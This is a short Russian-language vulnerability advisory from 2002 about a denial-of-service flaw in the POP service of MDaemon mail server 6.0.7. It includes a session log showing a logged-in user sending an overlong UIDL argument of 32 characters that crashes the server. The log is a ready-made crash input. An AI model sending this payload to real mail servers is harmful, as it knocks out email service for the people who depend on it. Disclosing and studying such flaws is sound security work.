DoS против MDaemon SMTP/POP/IMAP server

Дата публикации:
30.10.2002
Всего просмотров:
1156
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание: Вследствие лёгкости настройки и в целом универсальности, сервер имеет очень широкое распространение среди пользователей win32-платформ. Скачать его можно с www.mdaemon.com.

Уязвимость найдена в POP-сервисе, а точнее в обработке им команд DELE и UIDL. Чрезмерная длина аргумента, переданного вместе с командой, приводит к переполнению буфера и аварийному завершению работы всего сервера. К сожалению, обе эти команды доступны лишь авторизовавшимся пользователям, то есть, чтобы убить сервер, вам нужно, по меньшей мере, иметь почтовый ящик на нём.

Эксперементы показали, что параметр должен иметь длину не менее 32-ух (!!!) байт. Вот лог атаки на локальный pop-сервер:

+OK dark.ru POP MDaemon ready using UNREGISTERED SOFTWARE 6.0.7 
USER D4rkGr3y
+OK D4rkGr3y... Recipient ok
PASS cool-pass
+OK D4rkGr3y@dark.ru's mailbox has 1 total messages (18356 octets).
UIDL 11111111111111111111111111111111

Connection to host lost...

Уязвимость найдена в MDaemon SMTP/POP/IMAP server v.6.0.7. Более ранние версии скорее всего тоже уязвимы.

Ссылки: Эксплоит
или введите имя

CAPTCHA